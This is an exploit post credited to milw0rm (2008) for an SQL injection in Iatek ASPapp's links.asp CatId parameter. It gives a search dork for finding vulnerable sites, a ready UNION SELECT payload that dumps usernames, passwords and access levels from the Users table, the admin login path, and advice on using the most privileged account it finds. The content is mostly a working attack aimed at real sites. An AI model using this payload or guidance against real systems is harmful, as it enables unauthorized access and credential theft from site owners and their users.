..##.....## ...##...## ....##.## .....###CoRPITX .....### ....##.## ...##...## ..##.....## -----------------Turkey-------------------------------------- --------- www.Hayalet-hack.com------------------------------- ----------www.xcorpitx-hack.com------------------------------ Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability ------------------------------------------------- you ll see lots of users like this but accesslevel ll help you for see admin ------------------------------------------------------------- ----------------example-------------------------------------- Links › guest › 12 › 1 user Links › editor › editor › 2 materator Links › manager› manager› 2 materator Links › surco › surco › 2 materator Links › admin › admin › 3 admin Links › ovivas › ovivas › 4 super-admin----- we ll login with this username ------------------------------------------------------------- ------------------------------------------------------------- i mean.. when you see big number 4 or 5 you can use this username and password ------------------------------------------------------------- ------- dork - ''links.asp?CatId'' ------- exploit- ------- admin login- ------- www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F ------- ------------------------------------------------------------- links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users ------------------------------------------------------------- thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque- # milw0rm.com [2008-03-19]